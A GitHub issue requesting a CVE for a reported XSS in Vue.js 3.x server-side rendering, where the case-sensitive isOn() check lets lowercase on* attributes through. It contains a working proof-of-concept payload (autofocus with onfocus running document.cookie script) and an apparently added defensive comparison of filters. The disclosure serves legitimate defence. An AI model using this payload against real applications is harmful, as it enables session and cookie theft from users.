CVE Request: Cross-Site Scripting via isOn() bypass in Vue.js 3.x SSR (GHSA-5w45-w79q-rpqq) #7300
Description
CVE Request — Vendor Unresponsive
I am requesting GitHub CNA to assign a CVE ID for a high-severity vulnerability in Vue.js. The vendor has not responded after 10 days. This is a separate vulnerability from the RCE reported in #7299.
Existing Advisory
- GHSA: GHSA-5w45-w79q-rpqq (submitted 2026-03-31, still in triage)
- MITRE: Ticket #2013988 (submitted 2026-03-25) + CVE Form (submitted 2026-04-03)
- Vendor: security@vuejs.org — notified 2026-03-25, zero response
Vulnerability Summary
| Field | Value |
|---|---|
| Product | Vue.js (vuejs/core) — @vue/shared, @vue/server-renderer |
| Versions | All Vue 3.x through 3.5.30 (latest) |
| CWE | CWE-79 (Improper Neutralization of Input During Web Page Generation) |
| CVSS | 7.2 High (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N) |
| Type | SSR Cross-Site Scripting — Regression of CVE-2018-6341 |
Root Cause
The isOn() function in packages/shared/src/general.ts:15 uses a case-sensitive check that only filters event attributes starting with on followed by an uppercase letter (e.g., onClick). However, HTML event attributes are case-insensitive, so onclick, ONCLICK, oNcLiCk all bypass the filter and render in SSR HTML output.
```js
// isOn() only matches "on" + uppercase third character
export const isOn = (key) =>
  key.charCodeAt(0) === 111 && // 'o'
  key.charCodeAt(1) === 110 && // 'n'
  (key.charCodeAt(2) > 122 || key.charCodeAt(2) < 97) // uppercase only! (i.e. any third character that is not a lowercase ASCII letter)
```

- onClick → filtered ✓
- onclick → bypasses filter ✗ (browser still executes)
- ONCLICK → bypasses filter ✗
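To make the case-sensitivity gap concrete from the defender's side, the following is an added JavaScript example; it is not Vue's code and not the project's fix. It reproduces the check quoted above, places a case-insensitive variant beside it, and runs both over a constructed set of attribute names to show which event-handler names each one catches and which slip through. The function names, the case-insensitive check, the audit helper and the sample attribute names are all assumptions made for illustration.

```javascript
// Added example (not Vue's code). Reproduces the case-sensitive isOn()
// check quoted from packages/shared/src/general.ts and compares it with an
// assumed case-insensitive variant over constructed attribute names.

// Reproduction of the quoted check: "on" + a third character that is not a
// lowercase ASCII letter, so onClick matches but onclick / ONCLICK do not.
function isOnCaseSensitive(key) {
  return (
    key.charCodeAt(0) === 111 && // 'o'
    key.charCodeAt(1) === 110 && // 'n'
    (key.charCodeAt(2) > 122 || key.charCodeAt(2) < 97)
  );
}

// Assumed hardened form (illustrative, not Vue's fix): HTML attribute names
// are case-insensitive, so compare "on" ignoring case and require that at
// least one further character follows it.
function isOnCaseInsensitive(key) {
  return key.length > 2 && key.slice(0, 2).toLowerCase() === 'on';
}

// Returns only the attributes a given checker would let through to SSR
// output, i.e. everything the checker does not flag as an event handler.
function keepNonEventAttrs(attrs, isOn) {
  const kept = {};
  for (const key of Object.keys(attrs)) {
    if (!isOn(key)) kept[key] = attrs[key];
  }
  return kept;
}

// Audit helper (assumed): names that the case-insensitive check flags but the
// case-sensitive check misses, i.e. the case variants that bypass isOn().
function findCaseVariantBypasses(names) {
  return names.filter((n) => isOnCaseInsensitive(n) && !isOnCaseSensitive(n));
}

// Constructed sample: the variants named in the report, plus non-event names
// that must survive either filter, and one hypothetical non-event name that
// merely begins with "on" (to show the false positive of the loose check).
const SAMPLE_ATTRS = {
  onClick: 'h',
  onclick: 'h',
  ONCLICK: 'h',
  oNcLiCk: 'h',
  onfocus: 'h',
  autofocus: '',
  one: 'hypothetical non-event attribute',
  id: 'user',
};

// Stand-alone demo output; the comparison functions above are the point.
console.log('strict check keeps :', Object.keys(keepNonEventAttrs(SAMPLE_ATTRS, isOnCaseSensitive)));
console.log('loose check keeps  :', Object.keys(keepNonEventAttrs(SAMPLE_ATTRS, isOnCaseInsensitive)));
console.log('bypass variants    :', findCaseVariantBypasses(Object.keys(SAMPLE_ATTRS)));
```

The trade-off is visible in the `one` entry: the original check requires an uppercase third character because Vue's own listener props are camelCase, so a blanket case-insensitive filter also drops any non-event attribute name that happens to begin with `on`. For SSR output, where the goal is never to emit an attribute the browser would execute, dropping such names is the conservative choice; an allow-list of the attributes an application actually expects to receive through `$attrs` is stricter still and does not depend on the filter at all.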
Proof of Concept
```js
import { createSSRApp } from 'vue'
import { renderToString } from 'vue/server-renderer'

const app = createSSRApp({
  template: '<input v-bind="$attrs" />',
  inheritAttrs: true
})

const html = await renderToString(app, {
  attrs: { autofocus: '', onfocus: 'alert(document.cookie)' }
})

// Output: <input autofocus onfocus="alert(document.cookie)">
// Zero-interaction XSS — autofocus triggers onfocus automatically
```

21 out of 21 DOM event handler attributes render in SSR output when using lowercase on* names.
Prior Art
- CVE-2018-6341 (Vue 2.x SSR v-bind XSS): The same class of vulnerability in Vue 2, fixed in v2.5.17. Vue 3's fix is incomplete — it only blocks camelCase event attributes, not lowercase/uppercase variants.
Disclosure Timeline
| Date | Action |
|---|---|
| 2026-03-25 | Reported to security@vuejs.org |
| 2026-03-25 | MITRE ticket #2013988 submitted |
| 2026-03-31 | GitHub PVR GHSA-5w45-w79q-rpqq submitted |
| 2026-04-03 | MITRE CVE Form submitted |
| 2026-04-04 | This GitHub CNA request |
| 2026-06-23 | 90-day public disclosure deadline |
Request
Please assign a CVE ID for this vulnerability. This is a distinct vulnerability (XSS, different root cause and CWE) from the RCE reported in #7299. The vendor has been completely unresponsive across all channels.